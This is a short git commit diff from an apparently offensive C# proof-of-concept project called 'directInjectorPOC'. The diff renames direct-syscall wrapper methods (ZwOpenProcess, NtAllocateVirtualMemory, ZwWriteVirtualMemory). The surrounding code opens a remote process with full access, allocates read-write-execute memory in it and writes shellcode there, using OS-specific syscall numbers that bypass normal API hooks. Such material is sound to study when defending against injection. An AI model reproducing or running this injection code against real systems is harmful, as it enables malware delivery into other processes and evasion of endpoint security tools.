This commit is contained in:
Felipe Bird
2019-12-20 12:40:25 -03:00
parent b37352e9e1
commit c2cfe2cbf6
2 changed files with 6 additions and 6 deletions
+3 -3
View File
@@ -98,7 +98,7 @@ namespace directInjectorPOC
IntPtr bufferReal = IntPtr.Zero;
IntPtr procHandle = IntPtr.Zero;
syscalls.ZwOpenProcess10(ref procHandle, nativeStructs.ProcessAccessFlags.All, new nativeStructs.OBJECT_ATTRIBUTES(), ref clientid, os);
syscalls.ZwOpenProcess(ref procHandle, nativeStructs.ProcessAccessFlags.All, new nativeStructs.OBJECT_ATTRIBUTES(), ref clientid, os);
IntPtr remoteAddr = new IntPtr();
switch (method)
@@ -107,12 +107,12 @@ namespace directInjectorPOC
Console.WriteLine("[+] Using ALLOCWRITE method to allocate our shellcode in the remote process");
UIntPtr sz = new UIntPtr(Convert.ToUInt32(shellcode.Length));
syscalls.NtAllocateVirtualMemory10(procHandle, ref remoteAddr, new IntPtr(0), ref sz, nativeStructs.MEM_COMMIT | nativeStructs.MEM_RESERVE, nativeStructs.PAGE_EXECUTE_READWRITE, os);
syscalls.NtAllocateVirtualMemory(procHandle, ref remoteAddr, new IntPtr(0), ref sz, nativeStructs.MEM_COMMIT | nativeStructs.MEM_RESERVE, nativeStructs.PAGE_EXECUTE_READWRITE, os);
IntPtr written = IntPtr.Zero;
IntPtr unmanagedPointer = Marshal.AllocHGlobal(shellcode.Length);
Marshal.Copy(shellcode, 0, unmanagedPointer, shellcode.Length);
syscalls.ZwWriteVirtualMemory10(procHandle, ref remoteAddr, unmanagedPointer, Convert.ToUInt32(shellcode.Length), ref written, os);
syscalls.ZwWriteVirtualMemory(procHandle, ref remoteAddr, unmanagedPointer, Convert.ToUInt32(shellcode.Length), ref written, os);
break;
case OPENSEC:
+3 -3
View File
@@ -127,7 +127,7 @@ namespace directInjectorPOC
}
};
public static NTSTATUS ZwOpenProcess10(ref IntPtr hProcess, ProcessAccessFlags processAccess, OBJECT_ATTRIBUTES objAttribute, ref CLIENT_ID clientid, string os)
public static NTSTATUS ZwOpenProcess(ref IntPtr hProcess, ProcessAccessFlags processAccess, OBJECT_ATTRIBUTES objAttribute, ref CLIENT_ID clientid, string os)
{
byte[] syscall = syscallSkeleton;
syscall[4] = sysDic[os]["openprocess"];
@@ -180,7 +180,7 @@ namespace directInjectorPOC
}
}
public static NTSTATUS ZwWriteVirtualMemory10(IntPtr hProcess, ref IntPtr lpBaseAddress, IntPtr lpBuffer, uint nSize, ref IntPtr lpNumberOfBytesWritten, string os)
public static NTSTATUS ZwWriteVirtualMemory(IntPtr hProcess, ref IntPtr lpBaseAddress, IntPtr lpBuffer, uint nSize, ref IntPtr lpNumberOfBytesWritten, string os)
{
byte[] syscall = syscallSkeleton;
syscall[4] = sysDic[os]["writevirtualmem"];
@@ -206,7 +206,7 @@ namespace directInjectorPOC
}
public static NTSTATUS NtAllocateVirtualMemory10(IntPtr hProcess, ref IntPtr BaseAddress, IntPtr ZeroBits, ref UIntPtr RegionSize, ulong AllocationType, ulong Protect, string os)
public static NTSTATUS NtAllocateVirtualMemory(IntPtr hProcess, ref IntPtr BaseAddress, IntPtr ZeroBits, ref UIntPtr RegionSize, ulong AllocationType, ulong Protect, string os)
{
byte[] syscall = syscallSkeleton;
syscall[4] = sysDic[os]["allocatevirtualmem"];